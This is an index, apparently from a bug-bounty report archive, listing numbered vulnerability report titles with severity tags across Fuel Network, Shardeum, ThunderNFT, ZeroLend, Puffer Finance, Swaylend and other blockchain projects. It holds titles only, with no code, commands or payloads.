    • Attackathon _ Fuel Network 32412 - [Smart Contract - Insight] the IFP divide functions does not have
    • Attackathon _ Fuel Network 32438 - [Smart Contract - Low] Unhandled Bailout During AbstractInstructi
    • Attackathon _ Fuel Network 32439 - [Smart Contract - Low] Missing Alignment Check During AbstractIns
    • Attackathon _ Fuel Network 32453 - [Smart Contract - Low] Unhandled Side Effect During AbstractInstr
    • Attackathon _ Fuel Network 32459 - [Websites and Applications - Low] URGENT WEB funds drained using
    • Attackathon _ Fuel Network 32465 - [Blockchain_DLT - High] Abuse of CCP instruction to do cheap memo
    • Attackathon _ Fuel Network 32486 - [Blockchain_DLT - Medium] Public RPC node craches via GraphQL API
    • Attackathon _ Fuel Network 32491 - [Smart Contract - Low] Incorrect PushA PopA Mask Calculation
    • Attackathon _ Fuel Network 32536 - [Smart Contract - Insight] The control flow graph is incorrectly
    • Attackathon _ Fuel Network 32537 - [Smart Contract - Low] Different data types can be used when init
    • Attackathon _ Fuel Network 32548 - [Smart Contract - Low] Uncaught Integer Overflow During AbstractI
    • Attackathon _ Fuel Network 32612 - [Smart Contract - Low] Lack of slot hashing at adminsw can cause
    • Attackathon _ Fuel Network 32628 - [Blockchain_DLT - Medium] A GraphQL query crashes core process
    • Attackathon _ Fuel Network 32673 - [Smart Contract - Low] Missing array length check for non constan
    • Attackathon _ Fuel Network 32695 - [Blockchain_DLT - Insight] increasing processing for public nodes
    • Attackathon _ Fuel Network 32696 - [Smart Contract - High] incorrect setting of non_negative value i
    • Attackathon _ Fuel Network 32700 - [Smart Contract - High] double increasing underlying value in cei
    • Attackathon _ Fuel Network 32703 - [Smart Contract - Low] Unexpected variable shadowing during ir ge
    • Attackathon _ Fuel Network 32706 - [Smart Contract - High] the function subtract in signed libs like
    • Attackathon _ Fuel Network 32728 - [Smart Contract - Low] Incorrect literal type inference
    • Attackathon _ Fuel Network 32730 - [Smart Contract - Low] The Sway compiler currently disallows read
    • Attackathon _ Fuel Network 32768 - [Blockchain_DLT - Medium] WDCM and WQCM doesnt respect the fuel-s
    • Attackathon _ Fuel Network 32786 - [Smart Contract - Low] incorrect set of i bits to which it should
    • Attackathon _ Fuel Network 32812 - [Smart Contract - Low] Sway-libSRC- Buffer overflow in swap_confi
    • Attackathon _ Fuel Network 32825 - [Blockchain_DLT - High] Consensus between -bit and -bit system ca
    • Attackathon _ Fuel Network 32835 - [Smart Contract - Insight] sway compiler doesnt prevent function
    • Attackathon _ Fuel Network 32849 - [Smart Contract - Low] Insufficient array construction element ty
    • Attackathon _ Fuel Network 32854 - [Smart Contract - Low] Sway-libstd-libcompiler Storage collision
    • Attackathon _ Fuel Network 32859 - [Smart Contract - Low] Incorrect argument pointer creation
    • Attackathon _ Fuel Network 32860 - [Blockchain_DLT - Insight] Resource Abuse CCP instruction is load
    • Attackathon _ Fuel Network 32872 - [Smart Contract - High] Incorrect load_store_to_memcopy optimizat
    • Attackathon _ Fuel Network 32884 - [Smart Contract - Medium] Compilerstd-lib storage collison betwee
    • Attackathon _ Fuel Network 32886 - [Smart Contract - Medium] Incorrect function purity check
    • Attackathon _ Fuel Network 32924 - [Smart Contract - Insight] sways legacy storage namespacing is br
    • Attackathon _ Fuel Network 32935 - [Smart Contract - Insight] Insufficient trait duplication check
    • Attackathon _ Fuel Network 32937 - [Smart Contract - Insight] Fallback function can be directly call
    • Attackathon _ Fuel Network 32938 - [Smart Contract - Insight] Insufficient declaration shadowing che
    • Attackathon _ Fuel Network 32965 - [Blockchain_DLT - Critical] Messages to L included even on revert
    • Attackathon _ Fuel Network 32973 - [Smart Contract - Medium] Impl block dependency overwriting
    • Attackathon _ Fuel Network 32978 - [Blockchain_DLT - Insight] isolating the node from the networkcau
    • Attackathon _ Fuel Network 32979 - [Smart Contract - Low] operations with StorageVec incorrectly rev
    • Attackathon _ Fuel Network 32987 - [Blockchain_DLT - Insight] Sending a message with ETH and data to
    • Attackathon _ Fuel Network 33039 - [Smart Contract - High] The subtraction function is not correctly
    • Attackathon _ Fuel Network 33045 - [Smart Contract - Low] Compiler Dead Code Elimination inconsisten
    • Attackathon _ Fuel Network 33101 - [Smart Contract - Insight] Associated functions that were impleme
    • Attackathon _ Fuel Network 33139 - [Smart Contract - Insight] Unreachable panic in sway compiler whe
    • Attackathon _ Fuel Network 33140 - [Smart Contract - Insight] Sway compiler crash when compile malic
    • Attackathon _ Fuel Network 33168 - [Smart Contract - High] Incorrect Sign Determination In Multiply
    • Attackathon _ Fuel Network 33170 - [Smart Contract - Medium] UFP Exp In Sway-lib Logic Vulnerability
    • Attackathon _ Fuel Network 33171 - [Smart Contract - Insight] panic on unwrapping in decl_to_type_in
    • Attackathon _ Fuel Network 33172 - [Smart Contract - Insight] OOB in type_check_analyze of ImplTrait
    • Attackathon _ Fuel Network 33175 - [Smart Contract - High] Sway-lib Subtract i Logic Vulnerability
    • Attackathon _ Fuel Network 33181 - [Smart Contract - Insight] users messages might encode incorrect
    • Attackathon _ Fuel Network 33186 - [Smart Contract - Medium] _compute_bytecode_root goes to an infin
    • Attackathon _ Fuel Network 33191 - [Smart Contract - Insight] Sway Formatting Behaves Differently Ba
    • Attackathon _ Fuel Network 33193 - [Blockchain_DLT - Medium] Fuel SDKs ABI Decoder Behaves Different
    • Attackathon _ Fuel Network 33195 - [Smart Contract - High] Incorrect Calculations in Subtraction Fun
    • Attackathon _ Fuel Network 33203 - [Smart Contract - Insight] function inlining doesnt consider asm
    • Attackathon _ Fuel Network 33207 - [Smart Contract - Insight] users created message when withdrawing
    • Attackathon _ Fuel Network 33227 - [Smart Contract - High] Lack of overflow protection in the pow fu
    • Attackathon _ Fuel Network 33233 - [Smart Contract - Medium] Incorrect Implementation of Unsigned -b
    • Attackathon _ Fuel Network 33239 - [Smart Contract - Low] Incorrect Implementation of IFP Min Functi
    • Attackathon _ Fuel Network 33240 - [Smart Contract - Insight] Incorrect Bitness in IFP Types
    • Attackathon _ Fuel Network 33242 - [Smart Contract - High] Incorrect Implementation of IFP Multiply
    • Attackathon _ Fuel Network 33248 - [Smart Contract - High] Incorrect Implementation of IFP Floor and
    • Attackathon _ Fuel Network 33267 - [Smart Contract - High] Bug in Multiply and Divide function
    • Attackathon _ Fuel Network 33286 - [Smart Contract - Insight] panic on unwrapping in type_check_trai
    • Attackathon _ Fuel Network 33295 - [Smart Contract - Low] Bug in array decoding can lead to critical
    • Attackathon _ Fuel Network 33302 - [Smart Contract - Medium] Exp function does not work correctly
    • Attackathon _ Fuel Network 33303 - [Smart Contract - Medium] Incorrect sign change
    • Attackathon _ Fuel Network 33331 - [Smart Contract - High] Overflow in Types Less Than u
    • Attackathon _ Fuel Network 33346 - [Blockchain_DLT - Low] Incorrect error handling when executing bl
    • Attackathon _ Fuel Network 33351 - [Smart Contract - Critical] ABI supertraits methods are available
    • Attackathon _ Fuel Network 33360 - [Blockchain_DLT - Medium] The typescript SDK has no awareness of
    • Attackathon _ Fuel Network 33401 - [Smart Contract - Insight] insight compiler crash - trait dummy m
    • Attackathon _ Fuel Network 33407 - [Smart Contract - Insight] Missing Zero-Check for to Address in w
    • Attackathon _ Fuel Network 33433 - [Smart Contract - Low] Self-append in Bytes data structure causes
    • Attackathon _ Fuel Network 33444 - [Smart Contract - Insight] Sway compiler crash for access out-of-
    • Attackathon _ Fuel Network 33450 - [Blockchain_DLT - Insight] fuel_gas_price_algorithm AlgorithmV ma
    • Attackathon _ Fuel Network 33451 - [Smart Contract - Medium] Incorrect code size estimation can bypa
    • Attackathon _ Fuel Network 33487 - [Smart Contract - Insight] Flags Do Not Affect Types Less Than u
    • Attackathon _ Fuel Network 33488 - [Smart Contract - Medium] Insecure implementation of StorageMap c
    • Attackathon _ Fuel Network 33519 - [Smart Contract - Critical] Silent Stack overflow on variables be
  • IDEX
    • Boost _ IDEX 34239 - [Smart Contract - Insight] Dont validate stale price in Pyth Network
    • Boost _ IDEX 34428 - [Smart Contract - Insight] Incorrect Condition in validateExitQuoteQuantityAndC
    • Boost _ IDEX 34437 - [Smart Contract - Insight] User positions could be unfairly liquidated due to s
    • Boost _ IDEX 34494 - [Smart Contract - High] Tokens deposit in ExchangeStargateVAdapterlzCompose is
    • Boost _ IDEX 34566 - [Smart Contract - Insight] Withdrawingsolwithdraw_delegatecall - Its possible f
  • Immunefi Arbitration
    • 29318 - [SC - Insight] Timelock contract should use canExecuteTransact...
    • 29341 - [SC - Insight] Unsafe Downcast vulnerability this can lead to ...
    • 29347 - [SC - Insight] Chainlinks latestRoundData might return stale o...
    • 29348 - [SC - Insight] Token price returned by PriceConsumer may be in...
    • 29384 - [SC - Insight] Malicious project can remove the ImmunefiGuard ...
    • 29432 - [SC - Low] Malicious project can grief reward payouts from...
    • 29445 - [SC - Insight] latestRoundData Call May Result Stale
    • 29467 - [SC - Low] RewardTimelockexecuteRewardTransaction - L Inco...
    • 29483 - [SC - Insight] RewardTimelockcanExecuteTransaction - Reward tr...
    • 29484 - [SC - Insight] Potential Loss of Precision in Conversion from ...
    • 29513 - [SC - Insight] Critical reentrancy vulnerability in executeRew...
    • 29604 - [SC - Insight] VaultDelegatesendReward - Token fees not subtra...
    • 29738 - [SC - Low] Missing Chainlink circuit breaker check allows ...
    • 29744 - [SC - Insight] Projects can pay rewards at up to below market...
    • 29760 - [SC - Insight] Enforcing Multiple Rewards During Arbitration B...
  • Lido: Mellow Vault
    • Boost _ Lido_ Mellow Vault 34756 - [Smart Contract - Insight] Missing calldata forwarding in Vaultde
  • Mitigation Audit | Folks Finance
    • Mitigation Audit _ Folks Finance 34929 - [Smart Contract - Critical] Accounting Discrepancy in Fee R
    • Mitigation Audit _ Folks Finance 34942 - [Smart Contract - Insight] In function function getTwapPric
    • Mitigation Audit _ Folks Finance 35089 - [Smart Contract - Insight] Malicious actor can control inte
  • Puffer Finance
    • 28612 - [SC - Insight] EigenLayers share rate can be massively inflate...
    • 28613 - [SC - Medium] User will lose funds
    • 28623 - [SC - Low] Timelock transaction that consume more then _ g...
    • 28625 - [SC - Insight] Gas griefing is possible on external call
    • 28629 - [SC - Insight] Missing restricted modifier on claimWithdrawalF...
    • 28630 - [SC - Insight] Improper Validation for Partial Filling of INCH...
    • 28632 - [SC - Insight] Setting delay at MINIMUM_DELAY in timelock fails
    • 28645 - [SC - Insight] Attacker Prevents All Users From Withdrawing Fu...
    • 28646 - [SC - Insight] Resubmission with Pause Bypass Potential Exploi...
    • 28650 - [SC - Insight] Protocol Insolvency due to the over inflated ca...
    • 28656 - [SC - Insight] Blocking redeemwithdraw from vault
    • 28660 - [SC - Insight] pufETHsrcTimelock_setDelay - L State constant M...
    • 28663 - [SC - Low] Deposit of stETH fails due to LIDOs - wei corno...
    • 28665 - [SC - Low] Underflow risk in receive function due to discr...
    • 28687 - [SC - Low] Timelocks executeTransaction incorrectly delete...
    • 28688 - [SC - Insight] Unhandled Failure of _executeTransaction Call i...
    • 28689 - [SC - Medium] incorrect lidoLockedETH value can block full re...
    • 28695 - [SC - Insight] pufETHsrcTimelockexecuteTransaction - L The tim...
    • 28698 - [SC - Insight] User can frontrun claim transaction to make cla...
    • 28702 - [SC - Insight] Malicious users can frontrun permits to DoS swaps
    • 28729 - [SC - Insight] MINIMUM_DELAY uses incorrect value of days ins...
    • 28732 - [SC - Insight] External Call from Eigen Layer can fail silentl...
    • 28773 - [SC - Insight] The function claimWithdrawalFromEigenLayer can ...
    • 28775 - [SC - Insight] pufETHsrcTimelocksolexecuteTransaction - This b...
    • 28777 - [SC - Low] pufETHsrcTimelocksolexecuteTransaction - This b...
    • 28779 - [SC - Insight] Missing sender address check in receive may lea...
    • 28788 - [SC - Critical] Slash during a withdrawal from EigenLayer will ...
    • 28789 - [SC - Low] Return value of call is not checked causing fai...
    • 28792 - [SC - Low] Return value of low level isnt checked executio...
    • 28796 - [SC - Low] The PufferVaultgetPendingLidoETHAmount will ret...
    • 28813 - [SC - Insight] PufferVaultclaimWithdrawalFromLido according to...
    • 28827 - [SC - Insight] Multi requestid claims can trigger DOS
    • 28833 - [SC - Insight] Missing slippage protection in functions deposi...
    • 28852 - [SC - Insight] Reverting permit transactions caught in the cat...
    • 28921 - [SC - Medium] Possibly protocol insolvency during a LIDO slas...
    • 28934 - [SC - Insight] TimelockcancelTransaction does not check asser...
    • 28942 - [SC - Insight] Self Destruction of inchRouter can lead to loss...
    • 28946 - [SC - Low] The assets accounting of the vault can become o...
    • 28947 - [SC - Insight] Info
    • 28964 - [SC - Insight] Claiming withdrawals from Lido can lead to unbo...
    • 28971 - [SC - Low] Double spending or double execution of transact...
    • 28991 - [SC - Insight] Contract uint delay variable cannot be set to i...
    • 29006 - [SC - Medium] Lack of Success check of the Timelock executeT...
    • 29015 - [SC - Low] Boolean return value of addresscall function no...
    • 29017 - [SC - Insight] Timelock is not capable of performing payable t...
    • 29033 - [SC - High] Queued data will be lost if Tx is unsuccessful ...
    • 29054 - [SC - Medium] Lido discounted withdrawals are not accounted for
    • 29060 - [SC - Medium] initiateETHWithdrawalsFromLido decreases totalA...
    • 29067 - [SC - Low] Puffer Finance Missing Verification of Externa...
    • 29073 - [SC - Insight] excuteTransaction in timelock contract will una...
    • 29080 - [SC - Insight] Uninitialized uups upgradeable can lead to loss...
    • 29081 - [SC - Insight] No constructor should be used to set in upgrade...
    • 29082 - [SC - Insight] Restricted modifier should not be used with int...
    • 29099 - [SC - Insight] Actual amount of stETH deposited is less than t...
    • 29106 - [SC - High] Insufficient Handling of Partial Failures in Wi...
    • 29110 - [SC - Insight] Insecure Token Allowance Management in PufferDe...
    • 29111 - [SC - Insight] Silent Failure of ERC Permit Calls in PufferDep...
    • 29116 - [SC - Low] Using deposit results in more shares for the sa...
  • Shardeum Ancillaries
    • Boost _ Shardeum_ Ancillaries 33040 - [Websites and Applications - Low] API CSRF protection bypass leading to arbitrary operator-cli command execution
    • Boost _ Shardeum_ Ancillaries 33392 - [Websites and Applications - Insight] Validator GUI password bruteforcing is possible using the proxies
    • Boost _ Shardeum_ Ancillaries 33490 - [Websites and Applications - Insight] Abusing blacklist functionality to get victims IP to be banned
    • Boost _ Shardeum_ Ancillaries 33522 - [Websites and Applications - Insight] Exposed Redis Service Vulnerability on apishardeumorg
    • Boost _ Shardeum_ Ancillaries 33558 - [Websites and Applications - Insight] In some instances the socket can be made to hang
    • Boost _ Shardeum_ Ancillaries 33571 - [Websites and Applications - Medium] Taking down the websocket server via malicious methods object override
    • Boost _ Shardeum_ Ancillaries 33577 - [Websites and Applications - Insight] Taking down the HTTP server via jayson -day vulnerability
    • Boost _ Shardeum_ Ancillaries 33692 - [Websites and Applications - Low] Reflected XSS in validator node endpoints leads to node shutdown via validator-gui
    • Boost _ Shardeum_ Ancillaries 33809 - [Websites and Applications - Insight] Blocking the user from interacting with GUI via rate-limiting abuse
    • Boost _ Shardeum_ Ancillaries 34298 - [Websites and Applications - Medium] archive-server can be killed by connected shardus-instance
    • Boost _ Shardeum_ Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to missing SameSiteStrict attribute resulting blackhat to perform authenticated action
    • Boost _ Shardeum_ Ancillaries 34392 - [Websites and Applications - Medium] JSON-RPC Complete Password Recovery Through Timing Attack
    • Boost _ Shardeum_ Ancillaries 34473 - [Websites and Applications - Low] Insight XSS in json rpc server without CSP bypass
    • Boost _ Shardeum_ Ancillaries 34474 - [Websites and Applications - Insight] SQL injection in json-rpc-server within thetxStatusSaver function via the IP argument leads to application shutdown
    • Boost _ Shardeum_ Ancillaries 34475 - [Websites and Applications - Low] CSRF in Json RPC Server allows requesting authenticated API endpoints
    • Boost _ Shardeum_ Ancillaries 34492 - [Websites and Applications - Insight] DoS via unbounded tx id list processing in api endpoints
    • Boost _ Shardeum_ Ancillaries 34508 - [Websites and Applications - Critical] Malicious archiver can overwtite account data on any active archiver
  • Shardeum Core
    • 32942 - [BC - Low] The ChainID and URL parameters that can modify ...
    • 32982 - [BC - Critical] Crashing all Validators Vulnerability in eth_g...
    • 32993 - [BC - Critical] Crashing Validators by triggering an uncaught e...
    • 33044 - [BC - Medium] Preventing the network from loading by disconne...
    • 33086 - [BC - Critical] Complete shutdown of the transaction processing...
    • 33151 - [BC - Critical] Front running initial account data distribution
    • 33222 - [BC - Critical] An attacker can control which nodes can and can...
    • 33254 - [BC - Medium] The signature used to Gossip an UnjoinRequest h...
    • 33277 - [BC - Critical] Validators can be crashed via GET
    • 33278 - [BC - Critical] Improper input validation leads to DOS and tota...
    • 33395 - [BC - Insight] DoS attack on peer nodes through gossip-valid-j...
    • 33424 - [BC - Critical] Improper input validation in safeJsonParse lead...
    • 33428 - [BC - Critical] Validators can be crashed via pp
    • 33473 - [BC - High] Cross-chain replay attacks are possible due to ...
    • 33483 - [BC - Critical] shardeum validator bypass loop breaking increme...
    • 33520 - [BC - Insight] Inconsistent consensus issue for BlakeF precomp...
    • 33576 - [BC - High] Lack of deduplication in joinarchiver requests ...
    • 33632 - [BC - Critical] Signature forgery on behalf of other nodes lead...
    • 33637 - [BC - Critical] In get_tx_timestamp a prototype pollution bri...
    • 33638 - [BC - Critical] In remove_timestamp_cache a prototype polluti...
    • 33655 - [BC - Critical] Complete shutdown of the transaction processing...
    • 33696 - [BC - Critical] Failure to validate golden ticket admin cert
    • 33735 - [BC - Insight] Network split due to the sync issue in PP modul...
    • 33745 - [BC - Critical] A math quirk in Javascript allows anyone to tak...
    • 33750 - [BC - Critical] Abusing setCertTime Transactions to drain node ...
    • 33766 - [BC - Critical] Improper input validation in TransactionConsenu...
    • 33813 - [BC - Insight] Double slashing of validators
    • 33848 - [BC - High] For the first cycles of the network a maliciou...
    • 33872 - [BC - Critical] Infinite loop in shardeum
    • 33922 - [BC - Critical] Steal Rewards and Take over Network by Faking A...
    • 33925 - [BC - Critical] Improper input validation in fixDeserializedWra...
    • 33941 - [BC - Critical] A missing check for the type of a variable allo...
    • 33946 - [BC - Critical] Lack of voter deduplication in sync_trie_hashes...
    • 33963 - [BC - Critical] Crashing the network by filling timestamp cache...
    • 33972 - [BC - Critical] Inflating the votes of the hash for a malicious...
    • 34012 - [BC - Critical] Improper input validation in repair_oos_account...
    • 34019 - [BC - Critical] Lack of vote validation in sync_trie_hashes lea...
    • 34020 - [BC - Critical] An alternative entry point with a separated but...
    • 34053 - [BC - Critical] Malicious HTTP responses allow systemic applica...
    • 34093 - [BC - Critical] lib-net can be used to force oom reap of shardu...
    • 34201 - [BC - Critical] Prototype pollution vulnerability in remove_tim...
    • 34252 - [BC - Critical] Bypass Certificate Signing Validation
    • 34349 - [BC - High] Archiver Join Limit Logic Error
    • 34353 - [BC - Critical] Killing nodes by polluting tx timestamp cache o...
    • 34364 - [BC - Insight] pp deserialization denial of service issue
    • 34422 - [BC - High] Forcing the new POQo system to fail preventing ...
    • 34456 - [BC - Critical] Lack of consensus validation in repair_oos_acco...
    • 34476 - [BC - Critical] remove_timestamp_cache prototype pollution lead...
    • 34481 - [BC - Critical] Bypassing sender verification in gossip-final-s...
    • 34484 - [BC - Critical] Tricking legit node to signed maliciously contr...
    • 34489 - [BC - Insight] ActivetsValidateRecordTypes do not check all th...
    • 34500 - [BC - Critical] Prototype pollution vulnerability in get_tx_tim...
  • ThunderNFT | IOP
    • IOP _ ThunderNFT 34455 - [Smart Contract - Low] Double Token Vulnerability leads to drain funds
    • IOP _ ThunderNFT 34496 - [Smart Contract - High] Users cant withdraw their funds for removed assets
    • IOP _ ThunderNFT 34519 - [Smart Contract - High] users cant withdraw their tokens when specific asse
    • IOP _ ThunderNFT 34522 - [Smart Contract - Low] Self-transfer would inflate the balance
    • IOP _ ThunderNFT 34534 - [Smart Contract - Critical] Maker will always only get token even if specif
    • IOP _ ThunderNFT 34542 - [Smart Contract - Insight] Not Handling Balance Entries Properly in the Wit
    • IOP _ ThunderNFT 34545 - [Smart Contract - Low] Smart contract can be taken over by malicious user b
    • IOP _ ThunderNFT 34560 - [Smart Contract - Critical] Updating sell-maker-orders does not provide ref
    • IOP _ ThunderNFT 34565 - [Smart Contract - High] Selling maker cant cancel to retrieve his funds whe
    • IOP _ ThunderNFT 34567 - [Smart Contract - Medium] users with current bid order can not update their
    • IOP _ ThunderNFT 34578 - [Smart Contract - Insight] unds Not Locked During Order Placement
    • IOP _ ThunderNFT 34585 - [Smart Contract - High] Permanent freezing of NFTS that seller deposit into
    • IOP _ ThunderNFT 34587 - [Smart Contract - High] Users might temporarily get their funds locked in P
    • IOP _ ThunderNFT 34605 - [Smart Contract - Critical] ERC tokens can be stolen because the amount is
    • IOP _ ThunderNFT 34629 - [Smart Contract - Critical] Theft of Deposited Funds
    • IOP _ ThunderNFT 34630 - [Smart Contract - Critical] Incorrect Token Sale Amount
    • IOP _ ThunderNFT 34636 - [Smart Contract - Critical] The amount is set to when creating the Executio
    • IOP _ ThunderNFT 34642 - [Smart Contract - High] strategy de-listing causes sellers NFTs locked on T
    • IOP _ ThunderNFT 34659 - [Smart Contract - Low] Pool Balance Inflation
    • IOP _ ThunderNFT 34677 - [Smart Contract - Insight] NFTs can not be canceled since the cancel_order
    • IOP _ ThunderNFT 34702 - [Smart Contract - Low] the function register_royalty_info does not allow to
    • IOP _ ThunderNFT 34714 - [Smart Contract - Medium] owner of NFT who have sell orderlisting NFT can n
    • IOP _ ThunderNFT 34736 - [Smart Contract - Critical] ERC tokens are stuck on the contract if more th
    • IOP _ ThunderNFT 34760 - [Smart Contract - Low] Off-by-one error in get_supported_asset
    • IOP _ ThunderNFT 34761 - [Smart Contract - Low] Off-by-one error in get_whitelisted_strategy
    • IOP _ ThunderNFT 34791 - [Smart Contract - Low] Incompatibility with SRC might lead to inability of
    • IOP _ ThunderNFT 34800 - [Smart Contract - Critical] Improper input validation in order update funct
    • IOP _ ThunderNFT 34816 - [Smart Contract - High] users cant call update_order to update the strategy
    • IOP _ ThunderNFT 34839 - [Smart Contract - Low] Royalty Fee limit is not enforced for registered col
    • IOP _ ThunderNFT 34848 - [Smart Contract - Low] Incorrect verification of deposit asset leads to cre
    • IOP _ ThunderNFT 34906 - [Smart Contract - Low] Existing Sell order can be executed despite payment
    • IOP _ ThunderNFT 34930 - [Smart Contract - Critical] User can only trade token when ERC is used
    • IOP _ ThunderNFT 34934 - [Smart Contract - Critical] thunder_exchangeupdate_order can be abused to s
    • IOP _ ThunderNFT 34943 - [Smart Contract - High] User cant withdraw asset from pool after asset_mana
    • IOP _ ThunderNFT 34949 - [Smart Contract - Critical] Missing proper validation when updating order
    • IOP _ ThunderNFT 34955 - [Smart Contract - Critical] Nfts of type may be stolen by updating an order
    • IOP _ ThunderNFT 34957 - [Smart Contract - Critical] executionResults always returns an amount of le
    • IOP _ ThunderNFT 34958 - [Smart Contract - Critical] Incorrect Setting of Amount in ExecutionResult
    • IOP _ ThunderNFT 34962 - [Smart Contract - Low] tranfer_from function have critical issue which lead
    • IOP _ ThunderNFT 34963 - [Smart Contract - Insight] Invalid orders persist in storage maps with no i
    • IOP _ ThunderNFT 34964 - [Smart Contract - Low] Faulty Index out of Bounds
    • IOP _ ThunderNFT 34966 - [Smart Contract - High] Royalty or protocol fee of will DoS executing order
    • IOP _ ThunderNFT 34967 - [Smart Contract - Insight] Insights Report
    • IOP _ ThunderNFT 34973 - [Smart Contract - Low] royalty_managerregister_royalty_info might not work
    • IOP _ ThunderNFT 34975 - [Smart Contract - Low] Read out of index
    • IOP _ ThunderNFT 34980 - [Smart Contract - Critical] Order side manipulation can lead to theft of NF
  • ZeroLend
    • 28875 - [SC - Medium] Unauthorized minting of vested NFTs
    • 28885 - [SC - Medium] Lack of check for Lockend in merge LockerToken ...
    • 28892 - [SC - Medium] ZeroLockermerge can make a voting lock last lon...
    • 28910 - [SC - High] Bool check wrong in registerGauge
    • 28912 - [SC - Critical] Attackers can control the vote result and ampli...
    • 28938 - [SC - Medium] Attacker can invalidate users supplyWithPermit ...
    • 28943 - [SC - Medium] DoS when user want to supply repay asset using...
    • 28955 - [SC - High] Malicious user can transfer all unclaimed rewar...
    • 28970 - [SC - Medium] Attacker can grief a user by making his supplyW...
    • 28987 - [SC - Medium] Manipulation of governance is possible by minti...
    • 28988 - [SC - High] Mechanism for distributing extra reward tokens ...
    • 28992 - [SC - High] Permanent freezing of additional reward tokens
    • 29012 - [SC - High] Votes manipulation in PoolVoter
    • 29019 - [SC - High] The ZeroLendToken contract in the Governance mo...
    • 29026 - [SC - High] Hackers can steal the unclaimed yield to get th...
    • 29031 - [SC - Critical] VestedZeroNFT tokens can be directly stolen thr...
    • 29047 - [SC - Insight] Reward is lost when totalSupply
    • 29052 - [SC - Medium] Pool funds could be locked due to Division by zero
    • 29059 - [SC - Medium] Race condition in StakingBonus will result in s...
    • 29062 - [SC - Critical] Attacker can steal locked balance of staked nft...
    • 29068 - [SC - Medium] AaveOracle contract does not verify price stale...
    • 29069 - [SC - Medium] Ability to deny users from repaying and supplyi...
    • 29078 - [SC - High] Theft of unclaimed yield due to the wrong calcu...
    • 29095 - [SC - High] The lockers supply can be arbitrarily inflated ...
    • 29101 - [SC - High] Staking in BaseLocker is broken
    • 29103 - [SC - Critical] Omnichain Stakers can permanently lose access t...
    • 29120 - [SC - High] Bug in reward distribution logic leads to theft...
    • 29121 - [SC - High] Any rewards sent to the PoolVoter will be undis...
    • 29122 - [SC - High] All reward tokens can be stolen by an attacker ...
    • 29123 - [SC - Medium] Griefing attack for VestedZeroNFT
    • 29130 - [SC - Medium] Unlimited Minting of VestedZeroNFT
    • 29135 - [SC - Critical] OmnichainStakingsolunstakeLP and OmnichainStaki...
    • 29137 - [SC - High] ZeroLend token is not behaving properly while c...
    • 29139 - [SC - Medium] Griefing attack to cause users to suffer penalt...
    • 29145 - [SC - High] zeroLendToken is bricked to use for whitelisted...
    • 29149 - [SC - Insight] DoS in Zero Registry configuration updation
    • 29170 - [SC - Medium] DoS by front-runnable externall call
    • 29175 - [SC - Insight] Granting DEFAULT_ADMIN_ROLE to the deployer in ...
    • 29181 - [SC - High] Tautology in PoolVoterregisterGauge makes it im...
    • 29186 - [SC - Insight] ValidationLogicvalidateBorrow - L-L Incorrect i...
    • 29188 - [SC - Insight] StakingBonuscalculateBonus wrongly utilizes BPS
    • 29189 - [SC - High] ZeroLendToken doesnt allow whitelisted users to...
    • 29190 - [SC - Insight] Permanent freezing of up to wei of yield each ...
    • 29198 - [SC - Medium] Griefing attack to cause the rewards of a user ...
    • 29204 - [SC - Critical] Direct theft of Users VestedZeroNFT by using sp...
    • 29211 - [SC - Critical] Voting manipulation cause by the possibility to...
    • 29213 - [SC - High] The function always revert if _stakeNFT True d...
    • 29225 - [SC - Insight] EarlyZEROVesting is having a rounding issue and...
    • 29244 - [SC - Insight] Using permit inside the function can lead to Do...
    • 29249 - [SC - Insight] Using permit inside the function can lead to Do...
    • 29262 - [SC - Insight] Some users can get more rewards than others whi...
    • 29267 - [SC - High] Wrong implementation causing some functions in ...
    • 29270 - [SC - High] The main functionality of the contract EarlyZER...
    • 29286 - [SC - Medium] MultiSigWalletremoveOwner - L The bug allows th...
    • 29288 - [SC - Critical] all NFTs can be stolen by calling VestedZeroNFT...
    • 29322 - [SC - Insight] Use safeTransfer instead of transfer
    • 29328 - [SC - Insight] zkSync ACLManager EOA as EMERGENCY_ADMIN
    • 29329 - [SC - Insight] Manta ACLManager EOA as EMERGENCY_ADMIN
    • 29331 - [SC - Insight] Manta ACLManager EOA as RISK_ADMIN
    • 29332 - [SC - Insight] Manta ReservesSetupHelper EOA as owner
    • 29342 - [SC - Insight] Lack of chainID validation allows reuse of sign...
    • 29344 - [SC - Insight] Price assets deposited manipulation
  • Swaylend | IOP
    • #35853 [SC-Medium] permissonless constructor always for front-running owner initialization.
    • #36034 [SC-Medium] truncation in the `present_value_borrow()` can lead to loss of accrued borrow interests.
    • #35908 [SC-Low] If the collateral token''s decimal is <= the base token decimal in a market, `collateral_value_to_sell()` will always revert & `available_to_borrow()` will return a wrong amount tha...
    • #35732 [SC-Low] Withdrawals can not be paused which could lead to protocol insolvency in case of issues
    • #35768 [SC-Insight] `Market.set_pyth_contract_id` should emit an event
    • #35831 [SC-High] By bypassing base_borrow_min limitation borrows can create inabsorbable loans
    • #35684 [SC-Critical] Incorrect Pyth Oracle Price Feed Process Leads to Wrong Collateral Value Calculation
    • #36158 [SC-Low] `Market.collateral_value_to_sell` will always revert if collateral_configuration
    • #36138 [SC-Insight] `Market.update_collateral_asset` should reuse old configuration's `asset_id`
    • #36137 [SC-Medium] `absorb_internal` might be DOSed
    • #36117 [SC-High] Permanent freezing of tokens when user sends extra tokens as update fee
    • #36108 [SC-Insight] `recipient` with a NULL address will lead to permanent loss of minted coins
    • #35724 [SC-Low] Users can withdraw collateral even when the admin pauses the contract.
    • #36065 [SC-Insight] `Market.update_market_configuration` should reuse old configuration's `base_token.decimals`
    • #35815 [SC-Medium] `Market.present_value_borrow` should be roundUp
    • #35760 [SC-Low] `market::available_to_borrow()` compares the collateral in USD against the borrow in base units
    • #35758 [SC-Critical] Loss of yield to the protocol due to incorrect interest rate applied
    • #35999 [SC-Insight] Incorrect event name
    • #35750 [SC-High] User loss due to Pyth oracle update fee being smaller than the msg amount sent
    • #35794 [SC-Insight] `Market.absorb` can be called when `Market.supply_collateral` is paused
    • #35767 [SC-Critical] constanct value is used to check `price.confidence`
    • #35876 [SC-High] Users will lose funds on calls to critical functions if the prices are not updated
    • #35793 [SC-High] `src-20.burn` should use "==" instead of ">="
    • #35761 [SC-Low] Unhandled smaller base decimals than 6 or bigger than the collateral's decimals
    • #35708 [SC-Insight] Adding too many collaterals will halt the protocol operation
  • Acre
    • #34836 [SC-Medium] Malicious party can make it impossible for debt to be completely repaid by donating a few tbtc to `stBTC.sol`
    • #34959 [SC-Low] `mintDebt` returns a wrong value
